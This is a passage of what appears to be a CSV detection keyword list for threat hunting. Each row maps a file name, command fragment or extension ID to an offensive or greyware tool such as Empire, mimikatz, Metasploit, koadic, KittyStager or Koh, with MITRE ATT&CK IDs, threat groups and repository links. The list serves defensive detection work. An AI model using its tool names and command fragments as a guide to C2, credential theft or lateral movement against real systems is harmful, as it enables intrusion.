Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SDCLTBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*kill-implant*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*killprocess.py*,offensive_tool_keyword,mythic,Cross-platform post-exploitation 
HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*kimi_MDPC/kimi.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*kindloader.exe* --extract kindlocker*,greyware_tool_keyword,tir_blanc_holiseum,Ransomware simulation,T1486 - T1204 - T1027 - T1059,TA0040 - TA0002 - TA0005,N/A,N/A,Ransomware,https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware,1,0,N/A,4,6,N/A,N/A,N/A,N/A -*kintercept.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*kintercept.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*kirbi_to_hashcat.py*,offensive_tool_keyword,Timeroast,Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID,T1558.003 - T1059.003 - T1078.004,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/SecuraBV/Timeroast,1,1,N/A,10,2,152,16,2023-07-04T07:12:57Z,2023-01-18T09:04:05Z -*kirbi2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*kirbi2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*kirbi2john.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*kirbikator.exe*,offensive_tool_keyword,kekeo,access the LSA (Local Security Authority) and manipulate Kerberos tickets. 
potentially allowing adversaries to gain unauthorized access to Active Directory resources and CIFS file shares,T1003,TA0006,N/A,N/A,Credential Access,https://github.com/gentilkiwi/kekeo,1,1,N/A,N/A,10,1277,216,2021-12-14T10:56:48Z,2015-01-13T21:24:09Z -*kite03/echoac-poc*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,1,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*kitrap0d.x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*kitrap0d_payload*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*kitten.dll*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*kitten/basicKitten*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*kitten_test.go*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*kittens/bananaKitten*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Kittielocal -*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*KittyStager -*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager ?*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager ??*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager.git*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager/cmd*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager/internal*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*KittyStager/kitten*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Kiwi Legit Printer*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*klezVirus/CheeseTools*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*klezVirus/inceptor*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*klezVirus/SilentMoonwalk*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*klnkiajpmpkkkgpgbogmcgfjhdoljacg*,greyware_tool_keyword,Free VPN for Chrome,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 
Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*klsecservices*,offensive_tool_keyword,Github Username,exploitation tools for attackers,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/klsecservices,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*klsecservices/rpivot*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,1,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*knajdeaocbpmfghhmijicidfcmdgbdpm*,greyware_tool_keyword,Guru VPN & Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*knmmpciebaoojcpjjoeonlcjacjopcpf*,greyware_tool_keyword,Thunder Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*known_hosts2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Koadic.persist*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koadic_load.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koadic_net.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koadic_process.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koadic_types.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koadic_util.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*koh filter add SID*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh filter list*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh filter remove SID*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session 
leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh filter reset*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh groups LUID*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh impersonate LUID*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 
